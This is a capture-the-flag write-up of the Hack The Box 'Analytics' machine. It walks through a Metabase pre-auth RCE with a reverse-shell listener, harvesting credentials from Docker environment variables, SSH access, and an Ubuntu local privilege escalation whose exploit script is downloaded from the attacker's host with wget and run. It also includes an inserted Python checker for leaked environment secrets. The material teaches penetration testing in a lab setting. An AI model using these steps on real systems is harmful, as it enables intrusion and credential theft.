Nmap Scan

IP Address: 10.129.149.35
Hostname: analytical.htb
Open Ports: 22 (SSH), 80 (HTTP)

Reconnaissance

Website Enumeration

Following the Nmap scan, I navigated to the website hosted on port 80. I discovered a login page and subsequently updated the /etc/hosts file to include both analytical.htb and data.analytical.htb.

127.0.0.1       localhost
127.0.1.1       kali
10.129.149.35   analytical.htb data.analytical.htb

Point of Compromise (POC)

Upon further inspection, I identified the login page as part of Metabase, a popular open-source data visualization platform.
I found a Pre-auth Remote Code Execution (RCE) exploit detailed here.

[Image: Metabase Exploit Source]

Initial Access

Exploit Setup

After reviewing the exploit, I customized it by inserting a reverse shell payload.

[Image: Exploit Preparation]

Obtaining the Setup Token

I accessed /api/session/properties to retrieve the setup token needed to proceed with the exploit.

[Image: Setup Token Retrieval]

Reverse Shell Generation

Using revshells.com, I crafted a reverse shell payload.

Note: Ensure the encoded payload does not include = characters.

[Image: Shell Generation]

Gaining Shell Access

With BurpSuite, I captured a request, replaced it with the malicious payload, and forwarded it to obtain an initial shell.

[Images: Burp Shell Launch; Shell Received; Shell Details]

┌──(root㉿kali)-[~/Documents/Notes/hackthebox/Analytics]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.16.4] from (UNKNOWN) [10.129.149.35] 45844
bash: cannot set terminal process group (1): Not a tty
bash: no job control in this shell
28b3b7e265f7:/$

Lateral Movement

Container Breakout

The initial shell was inside a Docker container.
Navigating to /app, I found the run_metabase.sh script:

28b3b7e265f7:/$ cd /app
cd /app
28b3b7e265f7:/app$ ls
ls
certs
metabase.jar
run_metabase.sh
28b3b7e265f7:/app$ cat run_metabase.sh
cat run_metabase.sh
#!/bin/bash

...

# Here we define which env vars are the ones that will be supported with a "_FILE" ending. We started with the ones that would contain sensitive data
docker_setup_env() {
    file_env 'MB_DB_USER'
    file_env 'MB_DB_PASS'
    file_env 'MB_DB_CONNECTION_URI'
    file_env 'MB_EMAIL_SMTP_PASSWORD'
    file_env 'MB_EMAIL_SMTP_USERNAME'
    file_env 'MB_LDAP_PASSWORD'
    file_env 'MB_LDAP_BIND_DN'
}


...

28b3b7e265f7:/app$

Notably, the script referenced sensitive environment variables.

Dumping Environment Variables

I enumerated the environment and discovered hardcoded credentials:

28b3b7e265f7:/app$ printenv
printenv
SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=28b3b7e265f7
LANGUAGE=en_US:en
MB_JETTY_HOST=0.0.0.0
JAVA_HOME=/opt/java/openjdk
MB_DB_FILE=//metabase.db/metabase.db
PWD=/app
LOGNAME=metabase
MB_EMAIL_SMTP_USERNAME=
HOME=/home/metabase
LANG=en_US.UTF-8
META_USER=************
META_PASS=******************
MB_EMAIL_SMTP_PASSWORD=
USER=metabase
SHLVL=4
MB_DB_USER=
FC_LANG=en-US
LD_LIBRARY_PATH=/opt/java/openjdk/lib/server:/opt/java/openjdk/lib:/opt/java/openjdk/../lib
LC_CTYPE=en_US.UTF-8
MB_LDAP_BIND_DN=
LC_ALL=en_US.UTF-8
MB_LDAP_PASSWORD=
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
MB_DB_CONNECTION_URI=
JAVA_VERSION=jdk-11.0.19+7
_=/bin/printenv
OLDPWD=/
28b3b7e265f7:/app$
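The defender-side version of the enumeration above, as an added example that is not part of the original writeup: a small Python checker that parses a printenv dump, flags non-empty variables with secret-like names or URIs carrying embedded credentials, and masks the values so the report can be shared. The sample dump is constructed from the output above with placeholder credential values; the function names are my own.

```python
import re
from typing import List, Tuple

# Constructed sample modelled on the printenv output above; the real
# credential values are replaced by obvious placeholders.
SAMPLE_PRINTENV = """\
SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=28b3b7e265f7
MB_DB_FILE=//metabase.db/metabase.db
META_USER=<PLACEHOLDER_USER>
META_PASS=<PLACEHOLDER_PASSWORD>
MB_EMAIL_SMTP_PASSWORD=
USER=metabase
LD_LIBRARY_PATH=/opt/java/openjdk/lib/server:/opt/java/openjdk/lib
MB_LDAP_PASSWORD=
MB_DB_CONNECTION_URI=
"""

# Names that conventionally carry secrets, matched on whole underscore-separated
# components so that LD_LIBRARY_PATH does not match on "PASS".
SECRET_NAME = re.compile(
    r"(^|_)(PASS(WORD|WD)?|SECRET|TOKEN|API_KEY|PRIVATE_KEY|CREDENTIALS?)($|_)")
# Connection strings with embedded credentials, e.g. postgres://user:pw@host/db
CREDS_IN_URI = re.compile(r"^[a-z][a-z0-9+.-]*://[^/\s:@]+:[^/\s@]+@", re.I)


def mask(value: str) -> str:
    """Keep a two-character prefix and the length so a report can be shared."""
    return value[:2] + "*" * (len(value) - 2) if len(value) > 2 else "*" * len(value)


def find_leaked_secrets(dump: str) -> List[Tuple[str, str, str]]:
    """Return (name, masked_value, reason) for each variable holding a secret.

    Empty variables are skipped: an empty MB_DB_PASS means the value was never
    injected (run_metabase.sh may read it from a *_FILE instead), not a leak.
    """
    findings = []
    for line in dump.splitlines():
        name, sep, value = line.partition("=")
        if not sep or not value:
            continue
        if SECRET_NAME.search(name):
            findings.append((name, mask(value), "secret-like variable name"))
        elif CREDS_IN_URI.match(value):
            findings.append((name, mask(value), "credentials embedded in URI"))
    return findings
```

The same check can be pointed at the Config.Env section of `docker inspect` output to catch credentials before a container ever starts.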

SSH Access

Using the leaked credentials, I gained SSH access to the main host:

┌──(root㉿kali)-[~/Documents/Notes/hackthebox/Analytics]
└─# ssh ********@analytical.htb
************@analytical.htb's password:
Welcome to Ubuntu 22.04.3 LTS (GNU/Linux 6.2.0-25-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Tue Oct 10 07:54:23 PM UTC 2023

  System load:              0.025390625
  Usage of /:               95.9% of 7.78GB
  Memory usage:             29%
  Swap usage:               0%
  Processes:                158
  Users logged in:          0
  IPv4 address for docker0: 172.17.0.1
  IPv4 address for eth0:    10.129.149.35
  IPv6 address for eth0:    dead:beef::250:56ff:feb0:b4ed

  => / is using 95.9% of 7.78GB


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Tue Oct 10 19:32:27 2023 from 10.10.16.4

Privilege Escalation

After researching potential vulnerabilities, I discovered a local privilege escalation involving Ubuntu (CVE-2023-2640).

Exploit Download & Hosting

git clone https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629.git
cd CVE-2023-2640-CVE-2023-32629
chmod +x exploit.sh
updog -p 80

(Hosting exploit locally via Updog.)

Execution on Target

On the target system:

wget http://10.10.16.79/exploit.sh -O exploit.sh
chmod +x exploit.sh
./exploit.sh

Successful privilege escalation:

root@analytics:/tmp/u# id
uid=0(root) gid=1000(metalytics) groups=1000(metalytics)

Conclusion

This box highlights the importance of:

  • Properly securing applications like Metabase (e.g., authentication hardening).
  • Avoiding credential leakage via environment variables.
  • Keeping systems patched against known vulnerabilities.

Through a combination of web exploitation, container breakout, credential harvesting, and local privilege escalation, full system compromise was achieved.